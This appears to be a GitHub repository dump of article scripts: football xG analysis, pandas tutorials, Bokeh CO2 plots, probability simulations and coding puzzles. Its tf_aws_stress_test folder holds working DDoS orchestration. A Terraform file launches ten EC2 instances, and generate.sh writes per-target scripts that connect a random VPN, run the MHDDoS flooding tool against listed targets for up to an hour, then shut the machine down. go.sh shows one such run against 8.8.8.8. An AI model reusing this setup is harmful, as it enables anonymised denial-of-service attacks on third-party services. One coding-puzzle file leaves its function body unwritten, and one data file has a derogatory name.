├── images ├── leagues.jpg ├── seasons.jpg ├── full_table.JPG ├── understat.JPG ├── requests_response_1.jpg └── requests_response_2.jpg ├── README.md ├── .gitignore ├── data-visualisation-bokeh.py ├── data ├── cart.csv ├── results.csv └── dead_rusnia.csv ├── luck.py ├── playground.py ├── tf_aws_stress_test ├── go.sh ├── main.tf └── generate.sh ├── add_two_numbers_as_linked_list.py ├── select_random_hashtags.py ├── longest_palindromic_substring.py ├── time-series.py ├── 538_xG_data.py ├── task_glovo.py ├── time-checks-generalized-experiment.py ├── leveraging-dataframes-in-python.py ├── update_aws_sg.py ├── time-checks.py ├── leveraging-dataframes-in-python.ipynb ├── co2_world.py ├── lambda_web_scraper.py ├── circle.html ├── data_manipulation_with_standard_lib.ipynb ├── football_why_winners_win_and_losers_loose.ipynb ├── co2-bokeh.ipynb ├── is_football_fair.ipynb └── E-Commerce_ Predicting Sales.ipynb /images/leagues.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/leagues.jpg -------------------------------------------------------------------------------- /images/seasons.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/seasons.jpg -------------------------------------------------------------------------------- /images/full_table.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/full_table.JPG -------------------------------------------------------------------------------- /images/understat.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/understat.JPG -------------------------------------------------------------------------------- /images/requests_response_1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_1.jpg -------------------------------------------------------------------------------- /images/requests_response_2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_2.jpg -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Notebooks for Articles 2 | 3 | Repository with random scripts and IPython Notebooks that I use to write my articles 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/* 2 | /*.csv 3 | *.png 4 | # *.jpg 5 | .ipynb_checkpoints 6 | .terraform* 7 | *tfstate* 8 | tf_aws_stress_test/targets_l4.txt 9 | tf_aws_stress_test/targets_l7.txt 10 | venv/ -------------------------------------------------------------------------------- /data-visualisation-bokeh.py: -------------------------------------------------------------------------------- 1 | from bokeh.io import output_file, show 2 | from bokeh.plotting import figure 3 | plot = figure(plot_width=400, tools='pan,box_zoom') 4 | plot.circle([1,2,3,4,5], [8,6,5,2,3]) 5 
| output_file('circle.html') 6 | show(plot) 7 | -------------------------------------------------------------------------------- /data/cart.csv: -------------------------------------------------------------------------------- 1 | name,color,category,price,quantity 2 | t-shirt,black,top,20,1 3 | pants,white,bottom,50,1 4 | blazer,yellow,top,100,1 5 | t-shirt,red,top,15,2 6 | t-shirt,orange,top,25,1 7 | sneakers,white,footwear,100,1 8 | bracelet,green,accesories,5,3 -------------------------------------------------------------------------------- /luck.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | 3 | luck = 777 4 | actions = 100000 5 | total_hits = [] 6 | 7 | for i in range(actions): 8 | a = np.random.randint(0, 1000) 9 | if a == luck: 10 | total_hits.append(i) 11 | 12 | 13 | print(total_hits) 14 | print(len(total_hits)) 15 | -------------------------------------------------------------------------------- /playground.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import requests 3 | from bs4 import BeautifulSoup 4 | 5 | # df = pd.read_csv('data/data_blog.csv') 6 | 7 | res = requests.get('https://understat.com/league/La_liga/2017/') 8 | 9 | soup = BeautifulSoup(res.content) 10 | # print(soup.prettify()) 11 | 12 | table = soup.findAll('script') 13 | table 14 | -------------------------------------------------------------------------------- /data/results.csv: -------------------------------------------------------------------------------- 1 | team1,team2,goals1,goals2,result 2 | Barcelona,Granada,4,0,1 3 | Barcelona,Sevilla,1,1,X 4 | Barcelona,Athletic,2,1,1 5 | Barcelona,Cadiz,1,2,2 6 | Barcelona,Valencia,0,0,X 7 | Barcelona,Celta,3,2,1 8 | Barcelona,Girona,6,1,1 9 | Barcelona,Osasuna,1,0,1 10 | Barcelona,Real Madrid,4,0,1 11 | Barcelona,Betis,4,4,X 12 | Barcelona,Villarreal,4,2,1 -------------------------------------------------------------------------------- /tf_aws_stress_test/go.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 3 | set -x 4 | 5 | cd /home/ubuntu/MHDDoS 6 | source venv/bin/activate 7 | 8 | echo 'Starting' 9 | # sudo /etc/init.d/windscribe-cli start 10 | windscribe connect "Rakia" 11 | 12 | python3 start.py TCP 8.8.8.8:80 512 60 true 13 | python3 start.py TCP 8.8.8.8:443 512 60 true 14 | 15 | windscribe disconnect 16 | deactivate 17 | echo 'Finished, shutting down...' 18 | 19 | # sudo shutdown -------------------------------------------------------------------------------- /add_two_numbers_as_linked_list.py: -------------------------------------------------------------------------------- 1 | # Definition for singly-linked list. 2 | class ListNode(object): 3 | def __init__(self, x): 4 | self.val = x 5 | self.next = None 6 | 7 | class Solution: 8 | def addTwoNumbers(self, l1, l2, c = 0): 9 | # Fill this in. 
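        # A minimal recursive sketch of the missing body (the original file only says
        # "Fill this in"); it adds the two current digits plus the carry `c`, then
        # recurses on the remaining nodes, padding the shorter list with zero nodes.
        total = l1.val + l2.val + c
        node = ListNode(total % 10)
        carry = total // 10
        if l1.next or l2.next or carry:
            node.next = self.addTwoNumbers(l1.next or ListNode(0),
                                           l2.next or ListNode(0),
                                           carry)
        return node
        # Note: the driver code below uses the Python 2 statement `print result.val,`;
        # under Python 3 it would need to be print(result.val, end=' ').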
10 | 11 | l1 = ListNode(2) 12 | l1.next = ListNode(4) 13 | l1.next.next = ListNode(3) 14 | 15 | l2 = ListNode(5) 16 | l2.next = ListNode(6) 17 | l2.next.next = ListNode(4) 18 | 19 | result = Solution().addTwoNumbers(l1, l2) 20 | while result: 21 | print result.val, 22 | result = result.next 23 | # 7 0 8 24 | -------------------------------------------------------------------------------- /select_random_hashtags.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import pandas as pd 3 | 4 | 5 | file = 'data/hashtags.csv' 6 | 7 | data = pd.read_csv(file) 8 | 9 | amount_of_tags = 27 10 | selected_tags = [] 11 | top_limit = len(data) 12 | 13 | for i in range(top_limit): 14 | rand_ind = np.random.randint(0, top_limit) 15 | to_select = data.iloc[rand_ind, 0] 16 | selected_tags.append(to_select) 17 | data.drop([rand_ind], axis=0) 18 | if len(selected_tags) == amount_of_tags: 19 | break 20 | 21 | for i in range(amount_of_tags): 22 | print('#'+selected_tags[i]) 23 | -------------------------------------------------------------------------------- /longest_palindromic_substring.py: -------------------------------------------------------------------------------- 1 | class Solution: 2 | def longest_palindrome(self, s): 3 | if s == s[::-1]: 4 | return s 5 | max_len = 2 6 | winners = [] 7 | for i in range(len(s)): 8 | for ln in range(i+1, len(s)+1): 9 | ss = s[i:ln] 10 | if ss == ss[::-1]: 11 | if len(ss) >= max_len: 12 | max_len = len(ss) 13 | winners.append(ss) 14 | 15 | winners = [x for x in winners if len(x) == max_len] 16 | 17 | return winners 18 | 19 | st = "aamamamnaa" 20 | print(Solution().longest_palindrome(st)) 21 | 22 | -------------------------------------------------------------------------------- /tf_aws_stress_test/main.tf: -------------------------------------------------------------------------------- 1 | terraform { 2 | required_providers { 3 | aws = { 4 | source = "hashicorp/aws" 5 | version = "~> 3.27" 6 | } 7 | } 8 | 9 | required_version = ">= 0.14.9" 10 | } 11 | 12 | provider "aws" { 13 | profile = "default" 14 | region = "eu-west-1" 15 | } 16 | 17 | resource "aws_instance" "android_terminator" { 18 | 19 | count = 10 20 | 21 | ami = "ami-0e0f48e669d76f99d" 22 | instance_type = "t2.micro" 23 | security_groups = ["no-security-no-cry"] 24 | user_data = "${file("go_${count.index}.sh")}" 25 | 26 | tags = { 27 | Name = "article-${count.index}" 28 | } 29 | volume_tags = { 30 | "Name" = "article-${count.index}" 31 | } 32 | } -------------------------------------------------------------------------------- /time-series.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | import matplotlib.pyplot as plt 4 | import glob 5 | import seaborn as sns 6 | 7 | sns.set() 8 | 9 | pattern = 'data/madrid*.csv' 10 | csv_files = glob.glob(pattern) 11 | 12 | frames = [] 13 | 14 | for csv in csv_files: 15 | df = pd.read_csv(csv, index_col='date', parse_dates=True) 16 | frames.append(df) 17 | 18 | df = pd.concat(frames) 19 | 20 | df_time = df[['O_3', 'PM10']][df['station'] == 28079008].dropna() 21 | 22 | df.sort_values 23 | 24 | df_plot = df_time.resample('M').mean() 25 | plt.plot(df_plot) 26 | plt.title('O3 and PM10 air polution levels') 27 | plt.ylabel('micrograms per cubic meter (mg/m3)') 28 | plt.xticks(rotation=45) 29 | plt.show() 30 | -------------------------------------------------------------------------------- /538_xG_data.py: 
-------------------------------------------------------------------------------- 1 | import pandas as pd 2 | 3 | URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv' 4 | data = pd.read_csv(URL) 5 | 6 | championship = data[data['league'] == 'English League Championship'] 7 | championship = championship[['season', 'date', 'team1', 'team2', 'xg1', 'xg2']] 8 | championship['xga1'] = championship['xg2'] 9 | championship['xga2'] = championship['xg1'] 10 | 11 | home_data = championship[['season', 'team1', 'xg1', 'xga1']] 12 | away_data = championship[['season', 'team2', 'xg2', 'xga2']] 13 | 14 | home_groupped = home_data.groupby(['season', 'team1']).mean().reset_index() 15 | away_groupped = away_data.groupby(['season', 'team2']).mean().reset_index() 16 | 17 | final_data = pd.merge(home_groupped, away_groupped, left_on=['team1','season'], right_on=['team2','season']) 18 | final_data.drop(['team2'], axis='columns', inplace=True) 19 | final_data.rename({'team1': 'team', 'xg1': 'xG_h', 'xga1': 'xGA_h', 'xg2': 'xG_a', 'xga2': 'xGA_a'}, axis='columns', inplace=True) 20 | 21 | final_data.to_csv('data/xGA_championship.csv', index=False) 22 | print("Done!") -------------------------------------------------------------------------------- /task_glovo.py: -------------------------------------------------------------------------------- 1 | heights = [9,8,7,8,9,5,6] 2 | # heights = [1,9,3,3,5,5,3,5,7,3] 3 | ln = len(heights) 4 | total_sum = 0 5 | 6 | 7 | def find_hole(heights): 8 | first_max = 0 9 | ind_first_max = 0 10 | second_max = 0 11 | ind_second_max = 0 12 | # find borders 13 | for ind, h in enumerate(heights): 14 | if h > first_max: 15 | ind_first_max, first_max = ind_second_max, second_max 16 | ind_first_max, first_max = ind, h 17 | elif (h >= second_max and ind != ind_first_max): 18 | ind_second_max, second_max = ind, h 19 | 20 | # if borders create a hole, calculate the volume 21 | if abs(ind_first_max-ind_second_max) > 1: 22 | reverse = [] 23 | for h in heights[ind_first_max:ind_second_max+1]: 24 | reverse.append(second_max-h) 25 | part_sum = sum([x for x in reverse if x>0]) 26 | else: 27 | part_sum = 0 28 | 29 | return part_sum, ind_first_max, ind_second_max 30 | 31 | 32 | start = 0 33 | finish = ln 34 | # go through the list looking for holes and calculating its volumes till the end 35 | while finish - start > 1: 36 | part_sum, ind_first_max, ind_second_max = find_hole(heights[start:finish]) 37 | total_sum += part_sum 38 | start += max([ind_second_max,ind_first_max]) 39 | 40 | 41 | print("Total sum: "+str(total_sum)) -------------------------------------------------------------------------------- /tf_aws_stress_test/generate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm -rf go_*.sh 3 | 4 | # Params 5 | LAYER=$1 6 | TARGETS=$2 7 | 8 | VPNS=("Goodbye Lenin" "Hermitage" "Shnur" "Rakia") 9 | MAX_INDEX=$(expr ${#VPNS[@]} - 1) 10 | COUNTER=0 11 | 12 | while IFS="" read -r TARGET || [ -n "${TARGET}" ] 13 | do 14 | RAND=$(shuf -i 0-${MAX_INDEX} -n 1) 15 | VPN=${VPNS[${RAND}]} 16 | if [[ $LAYER -eq 4 ]] 17 | then 18 | # Template 19 | cat << EOF > go_$COUNTER.sh 20 | #!/bin/bash 21 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 22 | set -x 23 | 24 | cd /home/ubuntu/MHDDoS 25 | source venv/bin/activate 26 | 27 | echo 'Starting' 28 | windscribe connect "$VPN" # vpn name as param from list 29 | 30 | python3 start.py $TARGET 256 3600 true # from list 31 | 32 | windscribe disconnect 33 | deactivate 34 | echo 
'Finished, shutting down...' 35 | 36 | sudo shutdown 37 | EOF 38 | fi 39 | if [[ $LAYER -eq 7 ]] 40 | then 41 | # Template 42 | cat << EOF > go_$COUNTER.sh 43 | #!/bin/bash 44 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1 45 | set -x 46 | 47 | cd /home/ubuntu/MHDDoS 48 | source venv/bin/activate 49 | 50 | echo 'Starting' 51 | windscribe connect "$VPN" # vpn name as param from list 52 | 53 | python3 start.py $TARGET 5 256 "" 200 60 true # from list 54 | 55 | windscribe disconnect 56 | deactivate 57 | echo 'Finished, shutting down...' 58 | 59 | sudo shutdown 60 | EOF 61 | fi 62 | let COUNTER=${COUNTER}+1 63 | done < ${TARGETS} -------------------------------------------------------------------------------- /time-checks-generalized-experiment.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | import seaborn as sns 4 | 5 | sns.set() 6 | 7 | amount_of_checks = 1000 # how many times a person checks her/his phone 8 | 9 | np.random.seed(666) 10 | a = np.random.binomial(amount_of_checks, 0.044, size=10000) 11 | p_a_2 = np.sum(a > 1) / 10000 12 | p_a_3 = np.sum(a > 2) / 10000 13 | p_a_4 = np.sum(a > 3) / 10000 14 | print(" === Assuming average person checks their phone " + str(amount_of_checks) + " times per day === ") 15 | print("Probability of seeing 'lucky time' two times per day: " 16 | + str(p_a_2) + ", three: " + str(p_a_3) + ", four: " + str(p_a_4)) 17 | 18 | n_sequential = 0 19 | size = amount_of_checks 20 | sample = 1000000 21 | 22 | for s in range(sample): 23 | rare = np.random.random(size=size) < 0.044 24 | n_rare = np.sum(rare) 25 | if n_rare > 1: 26 | for i in range(size): 27 | if i == size-1: 28 | break 29 | elif rare[i] is True & rare[i+1] is True: 30 | n_sequential += 1 31 | if s % 1000 == 0: 32 | print('Processed: ' + str(s) + ' samples.') 33 | 34 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample))) 35 | 36 | bins = np.arange(0, max(a) + 1.5) - 0.5 37 | 38 | # plt.subplot(3, 1, 1) 39 | plt.hist(a, bins=bins, normed=True, color='red') 40 | plt.title('Phone usage') 41 | plt.xlabel('Amount of "lucky hours spotted during the day"') 42 | plt.ylabel('Probability') 43 | plt.show() 44 | -------------------------------------------------------------------------------- /leveraging-dataframes-in-python.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | 4 | cols = ['col0', 'col1', 'col2', 'col3', 'col4'] 5 | rows = ['row0', 'row1', 'row2', 'row3', 'row4'] 6 | data = np.random.randint(0, 100, size=(5, 5)) 7 | df = pd.DataFrame(data, columns=cols, index=rows) 8 | 9 | df.head() 10 | 11 | df['col1']['row1'] 12 | 13 | df.loc['row4', 'col2'] 14 | 15 | df.iloc[4, 2] 16 | 17 | df_new = df[['col1', 'col2']] 18 | df_new.head(3) 19 | 20 | df_new = df[['col1', 'col2']][1:4] 21 | df_new.head(3) 22 | 23 | df['col0'] 24 | df.loc[:, 'col0'] 25 | df.iloc[:, 0] 26 | 27 | df['col3'][2:5] 28 | 29 | df.loc['row1':'row4', :] 30 | df.iloc[1:4, :] 31 | 32 | df.loc[:, 'col1':'col4'] 33 | df.iloc[:, 1:4] 34 | 35 | df.loc['row1':'row4', 'col1':'col4'] 36 | df.iloc[1:4, 1:4] 37 | 38 | df.loc['row2':'row4', ['col1', 'col3']] 39 | df.iloc[[2, 4], 0:4] 40 | 41 | df[df['col1'] > 20] 42 | # assigning variable also works 43 | condition = df['col1'] > 20 44 | df[condition] 45 | 46 | df[(df['col1'] > 25) & (df['col3'] < 30)] # logical and 47 | df[(df['col1'] > 25) | (df['col3'] < 30)] # logical or 
48 | df[~(df['col1'] > 25)] # logical not 49 | 50 | df.iloc[3, 3] = 0 51 | df.iloc[1, 2] = np.nan 52 | df.iloc[4, 0] = np.nan 53 | df['col5'] = 0 54 | df['col6'] = np.NaN 55 | df.head() 56 | 57 | df.loc[:, df.all()] 58 | 59 | df.loc[:, df.any()] 60 | 61 | df.loc[:, df.isnull().any()] 62 | 63 | df.loc[:, df.notnull().all()] 64 | 65 | df_na_any = df.dropna(how='any') # if any value in a row is NaN it will be dropped 66 | df_na_all = df.dropna(how='all', axis=1) # if all values in a row are NaN it will be dropped 67 | 68 | # Find a column based on another 69 | df['col1'][df['col2'] > 35] 70 | 71 | df['col1'][df['col2'] > 35] += 5 72 | df[df['col1'] > 35] 73 | 74 | df['new_col'] = df['col4'].apply(lambda n: n*2) 75 | 76 | df.index.str.upper() 77 | 78 | df.index.map(str.lower) 79 | 80 | red_vs_blue = {0:'blue', 12:'red'} 81 | 82 | df['color'] = df['col3'].map(red_vs_blue) 83 | df.head() 84 | 85 | df['col7'] = df['col3'] + df['col4'] 86 | df.head() -------------------------------------------------------------------------------- /update_aws_sg.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import boto3 3 | from botocore.exceptions import ClientError 4 | 5 | GROUP_ID = 'GROUP-ID' 6 | RULE_DESCRIPTION = 'Rule Description' 7 | NEW_IP = requests.get('http://checkip.amazonaws.com').text[:-1] + '/32' 8 | OLD_IP = '' 9 | 10 | ec2 = boto3.client('ec2') 11 | 12 | try: 13 | response = ec2.describe_security_groups(GroupIds=[GROUP_ID]) 14 | except ClientError as e: 15 | print(e) 16 | 17 | sg = response['SecurityGroups'] 18 | for el in range(len(sg)): 19 | if sg[el]['GroupId'] == GROUP_ID: 20 | ip_pems = sg[el]['IpPermissions'] 21 | for i in range(len(ip_pems)): 22 | if ip_pems[i]['IpRanges'][0]['Description'] == RULE_DESCRIPTION: 23 | OLD_IP = ip_pems[i]['IpRanges'][0]['CidrIp'] 24 | print('Old office Ip %s' % OLD_IP) 25 | 26 | if (OLD_IP != NEW_IP) & (OLD_IP != ''): 27 | try: 28 | d = ec2.revoke_security_group_ingress( 29 | GroupId = GROUP_ID, 30 | IpPermissions=[ 31 | { 32 | 'FromPort': 3306, 33 | 'ToPort': 3306, 34 | 'IpProtocol': 'tcp', 35 | 'IpRanges': [ 36 | { 37 | 'CidrIp': OLD_IP, 38 | 'Description': RULE_DESCRIPTION 39 | } 40 | ] 41 | } 42 | ] 43 | ) 44 | print('Ingress successfully removed %s' % d) 45 | except ClientError as e: 46 | print(e) 47 | 48 | try: 49 | d = ec2.authorize_security_group_ingress( 50 | GroupId = GROUP_ID, 51 | IpPermissions=[ 52 | { 53 | 'FromPort': 3306, 54 | 'ToPort': 3306, 55 | 'IpProtocol': 'tcp', 56 | 'IpRanges': [ 57 | { 58 | 'CidrIp': NEW_IP, 59 | 'Description': RULE_DESCRIPTION 60 | } 61 | ] 62 | } 63 | ] 64 | ) 65 | print('Ingress successfully set %s' % d) 66 | except ClientError as e: 67 | print(e) 68 | -------------------------------------------------------------------------------- /time-checks.py: -------------------------------------------------------------------------------- 1 | import numpy as np 2 | import matplotlib.pyplot as plt 3 | import seaborn as sns 4 | 5 | sns.set() 6 | 7 | np.random.seed(666) 8 | a_min = np.random.binomial(28, 0.044, size=10000) 9 | p_a_min_2 = np.sum(a_min > 1) / 10000 10 | p_a_min_3 = np.sum(a_min > 2) / 10000 11 | p_a_min_4 = np.sum(a_min > 3) / 10000 12 | print(" === Assuming average person checks their phone 28 times per day === ") 13 | print("Probability of seeing 'lucky time' two times per day: " 14 | + str(p_a_min_2) + ", three: " + str(p_a_min_3) + ", four: " + str(p_a_min_4)) 15 | 16 | a_avg = np.random.binomial(47, 0.044, size=10000) 17 | p_a_avg_2 = np.sum(a_avg 
> 1) / 10000 18 | p_a_avg_3 = np.sum(a_avg > 2) / 10000 19 | p_a_avg_4 = np.sum(a_avg > 3) / 10000 20 | print(" === Assuming average person checks their phone 47 times per day === ") 21 | print("Probability of seeing 'lucky time' two times per day: " 22 | + str(p_a_avg_2) + ", three: " + str(p_a_avg_3) + ", four: " + str(p_a_avg_4)) 23 | 24 | a_max = np.random.binomial(86, 0.044, size=10000) 25 | p_a_max_2 = np.sum(a_max > 1) / 10000 26 | p_a_max_3 = np.sum(a_max > 2) / 10000 27 | p_a_max_4 = np.sum(a_max > 3) / 10000 28 | print(" === Assuming average person checks their phone 86 times per day === ") 29 | print("Probability of seeing 'lucky time' two times per day: " 30 | + str(p_a_max_2) + ", three: " + str(p_a_max_3) + ", four: " + str(p_a_max_4)) 31 | 32 | n_sequential = 0 33 | size = 28 34 | sample = 100000 35 | 36 | for _ in range(sample): 37 | rare = np.random.random(size=size) < 0.044 38 | n_rare = np.sum(rare) 39 | if n_rare > 1: 40 | for i in range(size): 41 | if i == size-1: 42 | break 43 | elif rare[i] is True & rare[i+1] is True: 44 | n_sequential += 1 45 | 46 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample))) 47 | 48 | bins_min = np.arange(0, max(a_min) + 1.5) - 0.5 49 | bins_avg = np.arange(0, max(a_avg) + 1.5) - 0.5 50 | bins_max = np.arange(0, max(a_max) + 1.5) - 0.5 51 | 52 | # plt.subplot(3, 1, 1) 53 | plt.hist(a_min, bins=bins_min, normed=True, color='red') 54 | plt.title('Minimum phone usage') 55 | plt.xlabel('Amount of "lucky hours spotted during the day"') 56 | plt.ylabel('Probability') 57 | plt.show() 58 | 59 | # plt.subplot(3, 1, 2) 60 | plt.hist(a_avg, bins=bins_avg, normed=True, color='green') 61 | plt.title('Average phone usage') 62 | plt.xlabel('Amount of "lucky hours spotted during the day"') 63 | plt.ylabel('Probability') 64 | plt.show() 65 | 66 | # plt.subplot(3, 1, 3) 67 | plt.hist(a_max, bins=bins_max, normed=True, color='blue') 68 | plt.title('Maximum phone usage') 69 | plt.xlabel('Amount of "lucky hours spotted during the day"') 70 | plt.ylabel('Probability') 71 | plt.show() 72 | 73 | -------------------------------------------------------------------------------- /leveraging-dataframes-in-python.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 3, 6 | "metadata": {}, 7 | "outputs": [], 8 | "source": [ 9 | "import pandas as pd\n", 10 | "import numpy as np" 11 | ] 12 | }, 13 | { 14 | "cell_type": "code", 15 | "execution_count": 18, 16 | "metadata": {}, 17 | "outputs": [], 18 | "source": [ 19 | "cols = ['col1', 'col2', 'col3', 'col4', 'col5']\n", 20 | "rows = ['row1', 'row2', 'row3', 'row4', 'row5']\n", 21 | "df = pd.DataFrame(np.random.randint(0,100,size=(5, 5)), columns=cols, index=rows)" 22 | ] 23 | }, 24 | { 25 | "cell_type": "code", 26 | "execution_count": 20, 27 | "metadata": {}, 28 | "outputs": [ 29 | { 30 | "data": { 31 | "text/html": [ 32 | "
(HTML table render of df.head(): rows row1-row5, columns col1-col5; same values as the text/plain output below)\n
" 101 | ], 102 | "text/plain": [ 103 | " col1 col2 col3 col4 col5\n", 104 | "row1 81 72 33 25 89\n", 105 | "row2 84 39 19 85 55\n", 106 | "row3 61 68 76 70 60\n", 107 | "row4 36 97 75 84 92\n", 108 | "row5 72 48 19 35 69" 109 | ] 110 | }, 111 | "execution_count": 20, 112 | "metadata": {}, 113 | "output_type": "execute_result" 114 | } 115 | ], 116 | "source": [ 117 | "df.head()" 118 | ] 119 | }, 120 | { 121 | "cell_type": "code", 122 | "execution_count": null, 123 | "metadata": {}, 124 | "outputs": [], 125 | "source": [] 126 | } 127 | ], 128 | "metadata": { 129 | "kernelspec": { 130 | "display_name": "Python 3", 131 | "language": "python", 132 | "name": "python3" 133 | }, 134 | "language_info": { 135 | "codemirror_mode": { 136 | "name": "ipython", 137 | "version": 3 138 | }, 139 | "file_extension": ".py", 140 | "mimetype": "text/x-python", 141 | "name": "python", 142 | "nbconvert_exporter": "python", 143 | "pygments_lexer": "ipython3", 144 | "version": "3.6.3" 145 | } 146 | }, 147 | "nbformat": 4, 148 | "nbformat_minor": 2 149 | } 150 | -------------------------------------------------------------------------------- /co2_world.py: -------------------------------------------------------------------------------- 1 | import pandas as pd 2 | import numpy as np 3 | 4 | from bokeh.io import curdoc 5 | from bokeh.plotting import figure 6 | from bokeh.models import HoverTool, ColumnDataSource, CategoricalColorMapper, Slider 7 | from bokeh.palettes import Spectral6 8 | from bokeh.layouts import widgetbox, row 9 | 10 | # Data cleaning and preparation 11 | data = pd.read_csv('data/co2_emissions_tonnes_per_person.csv') 12 | data.head() 13 | 14 | gapminder = pd.read_csv('data/gapminder_tidy.csv') 15 | gapminder.head() 16 | 17 | df = gapminder[['Country', 'region']].drop_duplicates() 18 | data_with_regions = pd.merge(data, df, left_on='country', right_on='Country', how='inner') 19 | data_with_regions = data_with_regions.drop('Country', axis='columns') 20 | data_with_regions.head() 21 | 22 | new_df = pd.melt(data_with_regions, id_vars=['country', 'region']) 23 | new_df.head() 24 | 25 | columns = ['country', 'region', 'year', 'co2'] 26 | new_df.columns = columns 27 | 28 | upd_new_df = new_df[new_df['year'].astype('int64') > 1963] 29 | upd_new_df.info() 30 | upd_new_df = upd_new_df.sort_values(by=['country', 'year']) 31 | upd_new_df['year'] = upd_new_df['year'].astype('int64') 32 | 33 | df_gdp = gapminder[['Country', 'Year', 'gdp']] 34 | df_gdp.columns = ['country', 'year', 'gdp'] 35 | df_gdp.info() 36 | 37 | final_df = pd.merge(upd_new_df, df_gdp, on=['country', 'year'], how='left') 38 | final_df = final_df.dropna() 39 | final_df.head() 40 | 41 | np_co2 = np.array(final_df['co2']) 42 | np_gdp = np.array(final_df['gdp']) 43 | np.corrcoef(np_co2, np_gdp) 44 | 45 | # Creating visualization app with Bokeh.io 46 | regions_list = final_df.region.unique().tolist() 47 | color_mapper = CategoricalColorMapper(factors=regions_list, palette=Spectral6) 48 | 49 | # Make the ColumnDataSource: source 50 | source = ColumnDataSource(data={ 51 | 'x': final_df.gdp[final_df['year'] == 1964], 52 | 'y': final_df.co2[final_df['year'] == 1964], 53 | 'country': final_df.country[final_df['year'] == 1964], 54 | 'region': final_df.region[final_df['year'] == 1964], 55 | }) 56 | 57 | # Save the minimum and maximum values of the gdp column: xmin, xmax 58 | xmin, xmax = min(final_df.gdp), max(final_df.gdp) 59 | 60 | # Save the minimum and maximum values of the co2 column: ymin, ymax 61 | ymin, ymax = min(final_df.co2), max(final_df.co2) 
62 | 63 | # Create the figure: plot 64 | plot = figure(title='Gapminder Data for 1964', plot_height=600, plot_width=1000, 65 | x_range=(xmin, xmax), 66 | y_range=(ymin, ymax), y_axis_type='log') 67 | 68 | # Add circle glyphs to the plot 69 | plot.circle(x='x', y='y', fill_alpha=0.8, source=source, legend='region', 70 | color=dict(field='region', transform=color_mapper), 71 | size=7) 72 | 73 | # Set the legend.location attribute of the plot 74 | plot.legend.location = 'bottom_right' 75 | 76 | # Set the x-axis label 77 | plot.xaxis.axis_label = 'Income per person (Gross domestic product per person adjusted for differences in ' \ 78 | 'purchasing power in international dollars, fixed 2011 prices, PPP based on 2011 ICP)' 79 | 80 | # Set the y-axis label 81 | plot.yaxis.axis_label = 'CO2 emissions (tonnes per person)' 82 | 83 | # Make a slider object: slider 84 | slider = Slider(start=min(final_df.year), end=max(final_df.year), step=1, value=min(final_df.year), title='Year') 85 | 86 | 87 | def update_plot(attr, old, new): 88 | # set the `yr` name to `slider.value` and `source.data = new_data` 89 | yr = slider.value 90 | 91 | new_data = { 92 | 'x': final_df.gdp[final_df['year'] == yr], 93 | 'y': final_df.co2[final_df['year'] == yr], 94 | 'country': final_df.country[final_df['year'] == yr], 95 | 'region': final_df.region[final_df['year'] == yr], 96 | } 97 | source.data = new_data 98 | 99 | # Add title to figure: plot.title.text 100 | plot.title.text = 'Gapminder data for %d' % yr 101 | 102 | 103 | # Attach the callback to the 'value' property of slider 104 | slider.on_change('value', update_plot) 105 | 106 | # Create a HoverTool: hover 107 | hover = HoverTool(tooltips=[('Country', '@country'), ('GDP', '@x'), ('CO2 emission', '@y')]) 108 | 109 | # Add the HoverTool to the plot 110 | plot.add_tools(hover) 111 | 112 | # Make a row layout of widgetbox(slider) and plot and add it to the current document 113 | layout = row(widgetbox(slider), plot) 114 | curdoc().add_root(layout) 115 | 116 | 117 | -------------------------------------------------------------------------------- /data/dead_rusnia.csv: -------------------------------------------------------------------------------- 1 | date,Personnel 2 | 01/03/2022,410 3 | 02/03/2022,130 4 | 03/03/2022,760 5 | 04/03/2022,150 6 | 05/03/2022,850 7 | 06/03/2022,1000 8 | 07/03/2022,600 9 | 08/03/2022,400 10 | 09/03/2022,500 11 | 10/03/2022,500 12 | 11/03/2022,500 13 | 12/03/2022,300 14 | 13/03/2022,100 15 | 14/03/2022,200 16 | 15/03/2022,1200 17 | 16/03/2022,300 18 | 17/03/2022,200 19 | 18/03/2022,200 20 | 19/03/2022,200 21 | 20/03/2022,300 22 | 21/03/2022,300 23 | 22/03/2022,300 24 | 23/03/2022,300 25 | 24/03/2022,200 26 | 25/03/2022,300 27 | 26/03/2022,300 28 | 27/03/2022,500 29 | 28/03/2022,400 30 | 29/03/2022,200 31 | 30/03/2022,100 32 | 31/03/2022,200 33 | 01/04/2022,200 34 | 02/04/2022,100 35 | 03/04/2022,200 36 | 04/04/2022,300 37 | 05/04/2022,200 38 | 06/04/2022,100 39 | 07/04/2022,300 40 | 08/04/2022,100 41 | 09/04/2022,100 42 | 10/04/2022,200 43 | 11/04/2022,200 44 | 12/04/2022,100 45 | 13/04/2022,200 46 | 14/04/2022,100 47 | 15/04/2022,100 48 